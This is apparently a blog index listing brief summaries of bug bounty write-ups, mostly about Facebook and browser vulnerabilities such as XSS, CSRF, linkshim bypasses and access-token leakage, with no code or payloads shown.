TL;DR: By abusing auth-based redirections and user-specific URIs on modern web applications, an attacker can easily identify and deanonymize any given predefined group of users across the web.
TL;DR: While doing some bug bounty hunting as usual, I ended up with a very cool reflected XSS vulnerability affecting Vine; here you can find the story behind it.
TL;DR: Here I’ll be talking about an interesting bypass for the so called «linkshim system», which Facebook mainly relies upon to protect its users from malicious URLs shared across the whole platform….
TL;DR: This would be a complementary entry for my previous writeup of the same title; here I’ll be talking about an interesting download carpet bombing exploit alongside some functionality bug(s)….
TL;DR: Some interesting URL Spoofing attacks, some functionality bugs and a neat exploit to blow your favourite browser up … just got excited after reading “The Browser Hacker’s Handbook”!
TL;DR: A CSRF vulnerability that could reset a Facebook user’s post-by-email address was hidden deep inside the Facebook mobile site, where you have to first trigger some kind of legacy browser fallback support and then to tweak with some parameter(s) to catch it!
TL;DR: By abusing Facebook social plugins like the activity feed plugin and/or the recommendations plugin, an attacker could retrieve valid sensitive tokens (e.g. access/m_sess tokens), unwittingly shared publicly across the Facebook platform….
TL;DR: Before Facebook’s migration to OAuth 2.0, it was possible to hijack a valid access token of any given pre-authorized Facebook app by injecting a specially-crafted iframe through a simple MITM attack.